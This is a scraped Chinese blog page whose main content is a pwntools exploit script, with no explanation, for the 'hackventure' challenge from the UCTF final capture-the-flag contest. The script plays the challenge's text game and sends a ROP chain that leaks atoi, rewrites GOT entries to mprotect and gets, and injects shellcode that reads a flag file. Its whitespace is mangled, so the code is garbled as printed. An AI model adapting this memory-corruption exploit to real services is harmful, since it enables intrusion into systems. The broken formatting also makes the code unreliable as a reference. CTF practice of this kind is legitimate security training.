uctf信息安全_UCTF Final-Hackventure

最新推荐文章于 2023-04-14 17:51:48 发布
最新推荐文章于 2023-04-14 17:51:48 发布
阅读量313 收藏
点赞数
文章标签: uctf信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39589693/article/details/111810791
版权

importsysfrom pwn import *

#context.log_level='debug'#by wah

exe= 'hackventure'ip= '127.0.0.1'port= 10001

#ip = '10.250.100.12'#port = 6666

me=[0,0]

home=[0,0]

store=[0,0]

server=[[0,0],[0,0],[0,0]]#100 10.10.10.1#200 10.1.11.1

server100 =[0,0]

server200=[0,0]

server300=[0,0]defgetpid():

time.sleep(0.1)

pid=pwnlib.util.proc.pidof(exe)printpid

raw_input('go!')defwalk(f,t):if f==t:return

globalr

x= t[0]-f[0]

y= t[1]-f[1]#print f,t

#print x,y

if x<0:for i in range(-x):

r.sendline('go up')elif x>0:for i inrange(x):

r.sendline('go down')else:pass

if y<0:for i in range(-y):

r.sendline('go left')elif y>0:for i inrange(y):

r.sendline('go right')else:pass

defgetinfo():globalr,me,home,store,server,server100,server200,server300

r.recvuntil('+--------------------------------+\n')

matrix= r.recvuntil('\n+--------------------------------+\n')printmatrix#print binascii.hexlify(matrix)

sr =[]for i inrange(len(matrix)):if matrix[i] == 'T':

s=ielif matrix[i] == 'S':

sr.append(i)elif matrix[i] == 'H':

h=ielif matrix[i] == '*':

m=ielse:passme[1] = m%35me[0]= m/35+1home[1] = h%35home[0]= h/35+1store[1] = s%35store[0]= s/35+1server[0][1] = sr[0]%35server[0][0]= sr[0]/35+1server[1][1] = sr[1]%35server[1][0] = sr[1]/35+1server[2][1] = sr[2]%35server[2][0] = sr[2]/35+1walk(me,server[0])

me=server[0]

r.sendline('explore')

r.recvuntil('IP:')

ip= r.recvuntil('\n').strip()#print ip

r.recvuntil('HP:')

hp= r.recvuntil('\n').strip()if ip == '10.10.10.1':

server100=server[0]elif ip == '10.1.11.1':

server200=server[0]else:

server300=server[0]

data= r.recvuntil('$')

walk(me,server[1])

me= server[1]

r.sendline('explore')

r.recvuntil('IP:')

ip= r.recvuntil('\n').strip()#print ip

r.recvuntil('HP:')

hp= r.recvuntil('\n').strip()if ip == '10.10.10.1':

server100= server[1]elif ip == '10.1.11.1':

server200= server[1]else:

server300= server[1]

data= r.recvuntil('$')

walk(me,server[2])

me= server[2]

r.sendline('explore')

r.recvuntil('IP:')

ip= r.recvuntil('\n').strip()#print ip

r.recvuntil('HP:')

hp= r.recvuntil('\n').strip()if ip == '10.10.10.1':

server100= server[2]elif ip == '10.1.11.1':

server200= server[2]else:

server300= server[2]

data= r.recvuntil('$')#print server100,server200,server300

deflocal_attack():

r.sendline('local_attack')defremote_attack(ip):

r.sendline('remote_attack' +ip)defremote_attacks(ips):

r.sendline('remote_attacks' +ips)

r=remote(ip,port)

r.sendline('map')

getinfo()

walk(me,server100)

me=server100

local_attack()

local_attack()

r.recvuntil('You have compromised server 10.10.10.1, good job!\n')

r.sendline('5')

r.recvuntil('Name?')

r.sendline('wah')#remote_attack('10.1.11.1')

r.sendline('status')

r.recvuntil('*** Hacker\'s Profile ***')

r.recvuntil('$')

walk(me,home)

me=home

r.sendline('goodnight')

walk(me,server100)

me=server100

getpid()

sc= '''call a;

a:pop rcx;

add rcx,35

push rcx

ret

.string "/home/flag/hackventure/flag";

lea rdi,[rcx-28];

mov rax,2;

mov rsi,0;

syscall;

mov rdi,rax;

xor rax,rax;

mov rsi,0x605200;

mov rdx,16;

syscall;

mov rdi,1;

mov rsi,0x605200;

mov rdx,16;

mov rax,1;

syscall;

mov rax,60;

xor rdi,rdi;

syscall;'''shellcode=asm(sc,arch='amd64',os='linux')

fakeebp= 0xaaaaaaaaaaaaaaaapop_rdi_ret= 0x4029F3pop_rsi_r15_ret= 0x4029F1atoi_got= 0x604098puts_plt= 0x400840call_getstring= 0x4014BC

#buf_to_store_mprotect = 0x604600

buf_to_store_mprotect_gets = 0x6040A0buflen= 18rubbish= 0xaaaaaaaapop_rbx_rbp_r12_r13_r14_r15_ret= 0x4029EAcall_mprotect= 0x4029D0memo_to_exec= 0x604000memo_len= 0x3000memo_prot= 0x7shellcode_addr= 0x605000shellcode_len= 0x1000plt_jmp_gets= 0x400940rop= ''rop+=p64(pop_rdi_ret)

rop+=p64(atoi_got)

rop+=p64(puts_plt)

rop+=p64(pop_rdi_ret)

rop+=p64(buf_to_store_mprotect_gets)

rop+=p64(pop_rsi_r15_ret)

rop+=p64(buflen)

rop+=p64(rubbish)

rop+=p64(call_getstring)

rop+= 'a'*0x68rop+=p64(pop_rbx_rbp_r12_r13_r14_r15_ret)

rop+=p64(0)

rop+= p64(1)

rop+=p64(buf_to_store_mprotect_gets)

rop+=p64(memo_prot)

rop+=p64(memo_len)

rop+=p64(memo_to_exec)

rop+=p64(call_mprotect)

rop+=p64(rubbish)

rop+= p64(0)#rbx

rop += p64(0)#rbp

rop += p64(0)#r12

rop += p64(0)#r13

rop += p64(0)#r14

rop += p64(0)#r15

rop +=p64(pop_rdi_ret)

rop+=p64(shellcode_addr)

rop+=p64(plt_jmp_gets)

rop+=p64(shellcode_addr)

fuck1= p64(fakeebp) +rop

remote_attacks('1,2,3,4,'+fuck1)

walk(me,server300)

local_attack()

local_attack()

local_attack()

local_attack()

local_attack()

r.recvuntil('Game Over!\n')

data= r.recvuntil('\n')[:-1]

atoi= u64(data + (8-len(data))*'\x00')

log.info("Leaked atoi:"+hex(atoi))

mprotect= atoi+0xbaa30gets= atoi +0x354d0data= p64(mprotect) +p64(gets)#overwrite got to mprotect and gets

r.sendline(data)#write shellcode

r.sendline(shellcode)

r.recvuntil('Please own this server first.\n')

flag= r.recv(16)printflag

r.close()

weixin_39589693
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
jboss-annotations-api_1.3_spec-2.0.1.Final-API文档-中英对照版.zip
07-13
赠送原API文档:jboss-annotations-api_1.3_spec-2.0.1.Final-javadoc.jar; 赠送源代码:jboss-annotations-api_1.3_spec-2.0.1.Final-sources.jar; 赠送Maven依赖信息文件:jboss-annotations-api_1.3_spec-2.0.1...
UCTF Final-Hackventure
weixin_30847939的博客
08-23 302
  抽出世间将UCTF Final中的hackventure给记录下,算是个总结。题目是有一个游戏,游戏地图是随机生成的,用户可以攻打Server,如果3个Server都被攻占的话,那么用户就赢了,但是并没有Flag。   题目以及IDB见:http://files.cnblogs.com/files/wangaohui/hackventure-blog.zip   题目是一个C++的题目,结...
UUCTF(公共赛道)
qq_62046696的博客
11-09 1109
sys|pas|read|file|ls|cat|tac|head|tail|more|less|php|base|echo|cp|\$|\*|\+|\^|scan|\.|local|current|chr|crypt|show_source|high|readgzfile|dirname|time|next|all|hex2bin|im|shell禁用了许多的命令,但是没有禁用掉\,这不就可以进行转义了吗。思路很简单,就是可能被以前的思想限制了,直接用a的地址空间,然后a和b用的一个内存变量,所以给。
UNCTF2022 wp
网安小菜鸡
01-16 930
UNCTF2022 wp
uctf信息安全_UCTF2016 twi Writeup
weixin_39613561的博客
12-21 397
前言该题目分类为REVERSE。最终目标是提交一个flag。从题目来看,本题目应该是UCTF 2016中的题目,可能是由于笔者的搜索能力还有待提高,没有能够找到相关的Writeup。所以,本次只能自己摸着石头过河了。解题准备验证下载正确性基础信息分析文件类型识别可以看到,文件是Atmel AVR 8-bit 的ELF文件。查看是否有隐藏信息从binwalk的结果来看,应该没有什么隐藏的数据。字符串...
HNZUCTF findme
WeiDuoe的博客
04-14 203
CTF web
dependency_injection-1_0-final-spec.zip
02-19
dependency_injection-1_0-final-spec
hibernatetools-Update-4.1.1.Final_2013-12-08_01-06-33-B605
05-13
Eclipse用于Hibernate框架开发插件,全CSDN最低资源分下载,让你吃上真正的石灰。。。
hibernatetools-Update-4.1.1.Final_2013-12-08_01-06-33-B605.zip
01-28
Eclipse中Hibernate插件。
「系统安全」linuxn内核远控_canye_final - APT.zip
12-04
「系统安全」linuxn内核远控_canye_final - APT 移动安全 网络安全 安全防护 AI安全 安全架构
[UCTF 2021]wp
Huamang的博客
03-15 258
Source it! js代码直接泄露了 function checkPassword(form) { password1 = form.password1.value; name = form.name.value; var username = "admin"; var hash = "1bea3a3d4bc3be1149a75b33fb8d82bc";
uctf-杂项题目分析
weixin_33762321的博客
03-08 292
路人甲 · 2014/10/28 15:04BP 断点分数:100 描述: 提示 1:key 不是大家喜欢的波波老师!提示 2:bmp+png提示 3:CRC Link: pan.baidu.com/s/1o6x4FEEBmp 只是诱饵,给大家看看波波老师。关键在于 png 图片,根据 png 格式图片,以及提示,很明显可以想到利用 crc 去爆破宽度和高度。可以用 c 或者 py,py 在这题爆...
UCTF WriteUp
安全汪
06-01 1248
第一题是关于BrainFuck语言的,没啥说的,直接编译就行了。 看到没有,Key直接出来了。 KEY{wjTdUoAgqzxxnjfa9kan} 推荐给大家一个比较好的网站:http://esoteric.sange.fi/brainfuck/impl/interp/i.html 2. 首先看到第二张图片是著名的“猪圈密码”,这个可能对于没有接触过CTF的同学来说比较陌生,不过没
分布式系统.pptx
04-29
分布式系统.pptx
源代码-360通用ASP防护代码(防sql注入).zip
04-29
源代码-360通用ASP防护代码(防sql注入).zip
node-v8.1.0-darwin-x64.tar.gz
04-29
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
2020年ti杯电赛省赛A题代码整理
04-29
2020年ti杯电赛省赛a题的项目 分为 手机端(android),主显示端,姿态检测手环端,心率滤波读取端 mcu 采用的是esp32.结合了适配esp32的arduino以及rtos框架进行开发。 开发环境 及 语言 安卓为android studio java开发 esp32为platform io c/c++ 节点间通信方式 tcp直连,手机端为总服务端 手机端 android 原生开发 主显示端 屏幕ili9341 spi 触摸xpt2046 图形 adafruit gfx ad芯片 ads112c04 测温 lmt70 姿态检测端 9轴 bno055 心率检测 心电 ads1292
node-v6.15.0-sunos-x64.tar.gz
04-29
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
node-v9.3.0-x86.msi
最新发布
04-29
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
@echo off set ROBOT_REPORT_DIR=reports robot --outputdir %ROBOT_REPORT_DIR% --variablefile "variables.py" --test test_* --output output1.xml "Goodmanage\Goodlistsuite.robot" robot --outputdir %ROBOT_REPORT_DIR% --variablefile "variables.py" --test test_* --output output2.xml "Goodmanage\Singalgoodcombi.robot" robot --outputdir %ROBOT_REPORT_DIR% --variablefile "variables.py" --test test_* --output output3.xml "Goodmanage\Goodgroupsuite.robot" rebot --outputdir %ROBOT_REPORT_DIR% --output final_report.html --merge %ROBOT_REPORT_DIR%\output1.xml %ROBOT_REPORT_DIR%\output2.xml %ROBOT_REPORT_DIR%\output3.xml Cannot merge outputs containing different root suites. Original suite is 'Goodlistsuite' and merged is 'Singalgoodcombi'
07-12
根据你提供的批处理文件内容以及错误信息,问题出在合并测试报告时,原因是合并的输出包含不同的根测试套件。 在你的批处理文件中,你分别执行了三个测试套件,并将它们的输出分别保存为`output1.xml`、`output2....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值